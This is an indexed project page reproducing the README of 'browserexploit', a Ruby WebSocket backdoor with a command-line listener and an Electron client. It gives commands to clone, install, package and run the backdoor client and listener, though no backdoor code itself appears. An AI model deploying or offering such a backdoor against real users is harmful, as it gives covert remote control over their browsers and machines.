An open API service indexing awesome lists of open source software.

https://github.com/krishpranav/browserexploit

A Simple Ruby Websocket Backdoor And Ruby Command Line Listener
https://github.com/krishpranav/browserexploit

backdoor electron exploitation framework hacking hacking-tool javascript ruby ruby-hacking security vscode

Last synced: 7 months ago
JSON representation

A Simple Ruby Websocket Backdoor And Ruby Command Line Listener

Awesome Lists containing this project

README

          

# browserexploit
A Simple Ruby Websocket Backdoor And Ruby Command Line Listener

[![forthebadge](https://forthebadge.com/images/badges/made-with-ruby.svg)](https://forthebadge.com)

## About browserexploit:
```
BrowserExploit is an Electron application that uses a JavaScript WebSocket Backdoor to connect to the listener.

The JavaScript backdoor in BrowserExploit can be used on all browsers that support WebSockets.
It will not have access to the Electron API of the host computer unless the BrowserBackdoor Client application is used.
```

## Installation

```
git clone https://github.com/IMcPwn/browser-backdoor
cd browser-backdoor
```

How to install and run the BrowserExploit client application:

```
cd client
npm install
npm start
```

How to build client executables (see [here](https://github.com/electron-userland/electron-packager) for more information):
```
cd client
npm install electron-packager -g
electron-packager . --all
```

How to run BrowserExploit:

```
cd server
gem install bundler
bundle install

ruby browserexploit.rb
```